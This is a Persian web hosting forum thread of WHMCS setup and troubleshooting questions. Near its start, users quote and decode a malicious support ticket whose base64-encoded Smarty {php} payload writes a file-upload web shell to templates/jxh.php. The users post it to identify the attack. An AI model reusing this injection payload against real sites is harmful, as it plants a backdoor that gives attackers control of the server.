-
پاسخ : آموزش جامع نصب و راه اندازی و فارسی سازی سیستم whmcs
دوستان چرا تیکتهای ارسالی به این شکل در میان
php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php
مشکلش چیه؟
-
دوست عزیز قصد هک کردن شما رو دارن
این کد یک فایل ایجاد میکنه :d
-
سلام
به قول دوستمان هک شدی من این واست دکود کردم
کد:
<?php $code = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");$fo = fopen("templates/jxh.php", "w");fwrite($fo, $code);
با رنگ قرمز مشخص کردم شل اونجاست
-
یعنی آموزش ها تموم شد؟؟؟؟
-
سلام دوستان من بعد چند وقت با این ارور هنگام چک کردن دامین مواجه شدم
در درخواست شما خطا وجود دارد:
باید کجا رو بررسی و تصحیح کنم ممنون میشم راهنمایی کنید ضمنا هر دامینی رو وارد میکنم میزنه موجود نیست
-
پورت 43 روی سرور رو چک کنید باز هستش یا بسته.
این پورت مخصوص هویز هستش. شاید مشکل پورت باشه
-
یکی از دوستان یک جمع بندی کنه در یک فایل پی دی اف
-
با سلام
من یک مشکلی دارم , میخوام کسی که دومین از بنده خریداری میکند باکس مدیریت dns در قسمت دامنه ها باشه تا کاربر به راحتی از اونجا dns های دومینشو تغغیر بده من باید چه کار کنم تا اوکی بشه؟
-
سلام دوستان اگه بخوایم برای یه کاربر یه فاکتور جدا از روند دوره ای ایجاد کنیم که سر تاریخ مقرر براش ارسال بشه به عنوان یاداور پرداخت باید چه کنی؟ میشه مسیر انجام و ریز جزییاتش بگید ممنون
-
دوستان لطفا راهنمایی کنید
cPHulk Brute Force Protection کجاست و چطوری باید خالیش کنیم ؟ تمام سفارشها pending می مونه و باید دستی اکتیو کنم
-
نقل قول:
نوشته اصلی توسط
seyhooni
دوستان لطفا راهنمایی کنید
cphulk brute force protection کجاست و چطوری باید خالیش کنیم ؟ تمام سفارشها pending می مونه و باید دستی اکتیو کنم
مدیر سرور میتونه از روت و whm وارد این قسمت بشه و db رو خالی کنه تا مشکل شما حل شه.
-
من یه مشکلی دارم
تیکت هارو که باز می کنم به آدرس تیکت منتقل می شه ولی صفحه اصلی را نشون می ده !!!
می ره به آدرس : http://*********/viewticket.php?tid=455387&c=KDV84gqN
با قالب های مختلف و زبان های مختلف تست کردم درست نشد !
راستی ارزون ترین جایی که لایسنس WHMCS می فروشه کجا هستش؟
-
نقل قول:
نوشته اصلی توسط
Mr.Amirhossein
من یه مشکلی دارم
تیکت هارو که باز می کنم به آدرس تیکت منتقل می شه ولی صفحه اصلی را نشون می ده !!!
می ره به آدرس :
http://*********/viewticket.php?tid=455387&c=KDV84gqN
با قالب های مختلف و زبان های مختلف تست کردم درست نشد !
راستی ارزون ترین جایی که لایسنس WHMCS می فروشه کجا هستش؟
مستقیم بگیرید از whmcs.com یا از فراسو بگیرید .
مستقیم 45 تومن در میاد فراسو 35
-
سلام
دوستان سیستم whmcs من الان یه 10روزی میشه ایمیل ارسال نمیکنه
تو لیست ارسالی هست ولی به دست کاربر نمیرسه
دوستانی که سردر میارن برای حل این مشکل راهنمایی کنن
پیشاپیش از همتون ممنون
-
نقل قول:
نوشته اصلی توسط
uoogle
سلام
پیشاپیش از همتون ممنون
سرور شما از کدوم دیتاسنتر می باشد
-
نقل قول:
نوشته اصلی توسط
kayako
سرور شما از کدوم دیتاسنتر می باشد
hetzner
-
نقل قول:
نوشته اصلی توسط
uoogle
hetzner
ارسال ایمیل رو بزارید روی php mail بررسی کنید بگید اینجا
-
نقل قول:
نوشته اصلی توسط
uoogle
سلام
پیشاپیش از همتون ممنون
cronjob هاتونم چک کنید که تنظیماتش بهم نریخته باشه
همچنین یوزر پسوردی رو که برای ایمیل مشخص کردید
-
سلام
این آموزش ها بسیار جامع بود
ممنون از (هاست 97 )
کاش مدیران یکم رسیدگی کنن به این تایپیک
متاسفانه خیلی خیلی شلوغ شده تایپیک
----------------------------------------------
بگذریم.
من یه مشکلی دارم
مشتری بعد از اینکه پرداخت میکنه، سیستم بازم میزنه (پرداخت نشده)
باید دستی اکتیو کنم
به مدیریت هاستینگ هم cPHulk Brute Force Protection رو خالی کنه
اما مشکل پا بر جاست
دوستان ممنون میشم کمک کنید
-
-
یک مشکلی که دارم من فایل کانفیگ رو کد کردم و در ضمن از قبل از کد کردن هم بک آپ ندارم
حالا مثلا می خواهم تغییر ساعت رو در اون اعمال کنم ( ست تایم روی تهران) مثلا
چه راهکاری هست؟
-
با چه متدی کد شده است ؟
میتونید از دیتا بیس بک آپ بگیرید و به راحتی کارتون رو بکنید و با یه اسم و نیم دی بی دیگه بالا بیارید whmcs رو به راحتی
-
1 فایل پیوست
دم همتون گرم خیلی عالی بود.فقط من از پنل وقتی میخوام برم تیکت هارو بخونم با اون مشگل عدم مجوز دسترسی مواجه میشم چطوری حلش کنم اینم شاتhttp://www.webhostingtalk.ir/attachm...85-whmcs-3-png
-
نقل قول:
نوشته اصلی توسط
21tarh
دوست عزیز شما اول یه دپارتمان باید بسازید تا این ارور رفع گردد تا بتونید وارد قسمت تیکت ها شوید
از طریق لینک زیر میتونید دارتمان ایجاد کنید
http://yordomain.com/admin/configticketdepartments.php
به جای /yordomain.com ادرس سایت خودتون رو قرار دهید
-
2 فایل پیوست
داداش دمت گرم حل شد مرسی.یه مشگل دیکه هم دارم میخوام ایمیل های که برای کاربر میفرسته 1 فارسی باشه 2 به این طورت باشه اینم شاتفایل پیوست 23374
- - - Updated - - -
سلام به همه بچه های گل.امیدوارم حالتون خوب باشه.اقا یه سوال تو هاست دهی اتومات وقتی میخواهیم پهانی باند رو مشخص کنیم میخواهین نامحدود بدیم باید چه عددی بزنیم اینم شاتفایل پیوست 23385
-
نقل قول:
نوشته اصلی توسط
21tarh
در قسمتی که پکیج میسازید باید گزینه نامحدود را تیک بزنید .
در whmcs هم
Unlimited
رو وارد کنید
-
1 فایل پیوست
سلام دوستان واقعا خیلی ازتون ممنونم .دمتون گرم.ولی یه مشگل دیگه برام پیش اومد.دوستان این رو هم راهنمایی کنید دیکه فکر نکنم مشگلی داشته باشم چون دیگه همه چی تموم شده اخرشه.قربون همه.اقایون من رسیلر دایرکت ادمین رو وصل whmcs کردم تا هاست دهی اتومات بده ولی وقتی کاربر سفارش میده پولشو پرداخت میکنه سیستم هاستشو اتومات نمیسازه حتی میرم قسمت سفارشات میزنم تکمیل سفارش با این مشگل بر میخورم اینم شات
فایل پیوست 23439 تروخدا یکی جوابمو بده
-
نقل قول:
نوشته اصلی توسط
21tarh
سلام دوستان واقعا خیلی ازتون ممنونم .دمتون گرم.ولی یه مشگل دیگه برام پیش اومد.دوستان این رو هم راهنمایی کنید دیکه فکر نکنم مشگلی داشته باشم چون دیگه همه چی تموم شده اخرشه.قربون همه.اقایون من رسیلر دایرکت ادمین رو وصل whmcs کردم تا هاست دهی اتومات بده ولی وقتی کاربر سفارش میده پولشو پرداخت میکنه سیستم هاستشو اتومات نمیسازه حتی میرم قسمت سفارشات میزنم تکمیل سفارش با این مشگل بر میخورم اینم شات
http://www.webhostingtalk.ir/attachm...-whmcs-021-png تروخدا یکی جوابمو بده
1- آی پی سرور مبدا در سرور مقصد در فایل blacklist وجود دارد
2- در فایر وال سرور مقصد ای پی بلاکه
3- پورت 2222 ممکنه بسته باشه در سرور مبدا.
هیمتا رو چک کنید نتیجه رو اعلام کنید
-
داداش ممنون بابت جواب دادنت.داداش میدونی من روز اول سی پنل رو وصل whmcs گردم بعد سفارش دادم هاست رو اتومات به خوبی داد و مشخصات رو برای کاربر فرستاد حالا امروز دایرکت رو اضافه کردم به این مشگل برخوردم بعد 1 ساعت کفتم بزار یه سی پنل سفارش بدم دیدم نه سی پنل هم اون طوری شده داداش من رسیلر سی پنل و دایرکت ادمین رو هر دوشو از جایی دیکه گرفته روی یه سرور نیست فکر کنم مشگل از خودمه بازم ممنون میشم راهنمایی کنی
-
سلام دوستان خوب هستید
یه سوال مبتدیانه داشتم من قبلا بدون استفاده از whmcs خودم روی whm اکانتام رو میساختم و ... الان تعددشون بالا رفته میخوام با whmcs مدیریتشون کنم . چجوری میتونم این اکانت هایی که ساخته شده رو بدم به whmcs و اینکه تو قسمت Cron jobs نوشته شده بود به cpanel برم و اونجا تنظیم کنم
اینجوری فقط برای همون اکانت این اتفاق نمیافته ؟ اگه بخاوم هر اکانتیم بازه زمانی و ... براش تعریف کنم که خودکار این کار رو انجام بده باید چیکار کنم ؟
ممنونم
-
( حل شد )
با سلام
برای انتقال پوشه های "attachments", "downloads" and "templates_c" به مشکل برخوردم
وقتی اونها به به پوشه قبل public انتقال میدم و مسیر رو در فایل کانفیگ تغییر میدم خطا میده که مسیر درست نیست...
بنده دارم روی دایرکت ادمین نصب رو انجام میدم.
و مسیر قبل public من به شکل زیر هست :
کد HTML:
CMD_FILE_MANAGER/domains/mysite.ir
و مسیر public به صورت زیر هست :
کد HTML:
CMD_FILE_MANAGER/domains/mysite.ir/public_html
و مسیر اصلی نصب whmcs :
کد HTML:
CMD_FILE_MANAGER/domains/mysite.ir/public_html/client
و در نهایت دستورات که به فایل کافیگ اضافه میکنم :
کد:
$templates_compiledir = 'domains/mysite.ir/templates_c/';
$downloads_dir = 'domains/mysite.ir/downloads/';
$attachments_dir = 'domains/mysite.ir/attachments/';
خطایی که میده :
Permissions Error
The templates compiling directory '/home/mysite.ir/templates_c/' must be writeable (CHMOD 777) before you can continue.
If the path shown is incorrect, you can update it in the configuration.php file.
دسترسی پوشه ها هم 777 هستش
ممنون میشم راهنمایی بفرمایید
( راه حل )
نحوه آدرس دهی مشکل بود.. با سرچ در انجمن دیدم مشکل تعدادی از دوستان هست .. گفتن راه رفع این خطا رو بزارم شاید مشکل کسی حل شد :
آدرس دهی صحیح:
برای پوشه های اتچ و دانلود هم به همین شکل آدرسی دهی کنید
/home/نام کاربری ورود به سایت/domains/دامنه شما/templates_c/
- - - Updated - - -
نقل قول:
در مقابل
Type گزینه cPanel را انتخاب کنید.
Username : نام کاربری WHM که نمایندگی روی آن ست شده است.
Password : رمز عبور WHM را وارد کنید.
Access Hash (Instead of password for cPanel servers) : برای مقدار دهی به این قسمت وارد WHM خود بشوید و بر روی Setup Remote Access Key کلیک کنید.
در این صفحه میتوانید با کلیک بر روی Generate New Key کد جدید را دریافت کنید که طولانی هست و از ترکیب حروف و اعداد هست. این کد را کپی کنید و به مدیریت WHMCS باز گردید و در قسمت Access Hash کپی کنید.
تیک Secure هم اختیاری هست و الان بر روی Save Changes کلیک کنید تا تنظمات سرور اضافه شود.
الان وارد whm شوید و Logout را بزنید و به مدیریت WHMCS باز گردید و الان نام سرور خود را میبینید و جلوی آن یک دکمه هست با نام WHM که اگر تنظیمات صحیح اعمال شده باشد با کلیک بر روی آن بدون لوگین کردن وارد WHM میشوید.
حال اگر سرور های بیشتری دارید میتوانید از این قسمت اضافه کنید.
اینجا منظور از WHM چیه؟
پنل سرور بنده دایرکت ادمین هست...
-
ببخشید اینیکه میگید کجاست ؟ از کجا باید چک کرد ؟
-
نقل قول:
نوشته اصلی توسط
fr_sdgh
نقل قول:
نوشته اصلی توسط
هاست 97
بخش نهم : 4 تنظیم امنیتی
انتقال attachments, downloads & templates_c
این سه احتیاج به دسترسی 777 دارند که در موقع نصب چنین دسترسی برای آن ایجاد شده است ، بدون شک بزرگترین معضل استفاده کنندگان از این سیستم هست که میتوان به راحتی آنها را به خارج از پوشه Public_html منتقل کرد. (قبلا یکبار این قسمت توضیح داده شده است)
برای این کار سه پوشه نام برده شده را به پوشه قبل از public_html با استفاده از گزینه move منتقل نمایید.
فایل configuration.php را ویرایش کنید و سه خط زیر را به آن اضافه کنید
کد:
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";
منظور از username در سه خط فوق همان نام کاربری هاست شما می باشد.
حال فایل configuration.php را ذخیره کنید و ناحیه کاربری سایت خود را بررسی کنید که به درستی کار میکند.
گاها اروری مبنی بر دسترسی 777 نمایش داده میشود که به دو دلیل هست.
خطوط فوق را به درستی ایجاد نکرده اید و مسیر فایل وجود ندارد(ممکن هست که علامت های PHP به درستی رعایت نشده است) و یا دسترسی فایل به 755 تقلیل یافته است(این مورد در اکثر سرور ها با توجه به کانفیگ آن بطور اتوماتیک رفع میشود و نیازی به اخذ دسترسی برای پوشه مورد نظر نیست).
.
اگر بعد از انتقال اون سه پوشه به قبل از public_html ارور 777 رو گرفتید، منتظر نمونید که فرجی بشه
توی direct admin این کد کارایی نداره:
کد:
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";
چون بیس توی مدیریت direct admin این هستش:
کد:
/home/[USERNAME]/domains/[mysite.com]/
پس باید این کد رو بزارید توی کانفیگ:
کد:
$templates_compiledir = '/home/[USERNAME]/domains/[mysite.com]/templates_c/';
$attachments_dir = '/home/[USERNAME]/domains/[mysite.com]/attachments/';
$downloads_dir = '/home/[USERNAME]/domains/[mysite.com]/downloads/';
-
سلام
whmcs نصب کردم چطور می توانم بهش پوسته یا قالب نصب کنم مثل وقتی کاربری وارد سایت میشه پلن رو نشون بده مث بیقه هاست فروش ها چطوری نصب میشه دوستان لطفا راهنمایی کنید.تشکر
-
اگر منظورتون قالب هست که چطوری قالب نصب کنید برید داخل فایل templates قالب رو با فولدر کامل بریزید و از پنل مدیریت تنظیمات اصلی عوض کنید اگر منظورتون چیزه دیگه میباشد بگید راهنمایی کنم
-
نقل قول:
نوشته اصلی توسط
kiarash-khatib
اگر منظورتون قالب هست که چطوری قالب نصب کنید برید داخل فایل templates قالب رو با فولدر کامل بریزید و از پنل مدیریت تنظیمات اصلی عوض کنید اگر منظورتون چیزه دیگه میباشد بگید راهنمایی کنم
ن دادش اونایی شما مگیی بلدم می خوام قالب بیرون نصب کنم وقتی کاربر می اید پلن ها ویقیه محصولات رو نشون lمیده برای ناحیه کاربر از whmcs استفاده کردم برای قالب بیرون حالا چطوری نصب کنم ،دادش بعضیا از وردپرس برای نماش محصولایشون وبعضیا مثل بنده از whmcs استفاده می گنند حالا چطوری نصب میشه قالب برای whmcs ؟
-
بستگی داره شما از چی بخواید استفاده کنید میخواید html باشه یا وردپرس بیشتریا میان whmcs + wordpress استفاده میکنند بعضیا هم html + whmcs
-
دادش می خوام اچ تی ام با Whmcs استفاده کنم قالب دارم فقط نمی دونم چطوری نصب کنم
-
بهترین روش اینه قالبتون مخلوط باشه یا اینکه اگر ادرس ناحیه کاربری جداس فایل های html بریزید و دستی تغییر بدید
-
نقل قول:
نوشته اصلی توسط
kiarash-khatib
بهترین روش اینه قالبتون مخلوط باشه یا اینکه اگر ادرس ناحیه کاربری جداس فایل های html بریزید و دستی تغییر بدید
دادش فعلان ناحیه کاربر رو روی دامنه اصلی لاگین کردم بدون قالب اگه اموزش جایی سراغ داری برم ببنیم تا این مشکل منم حل بشه. تشکر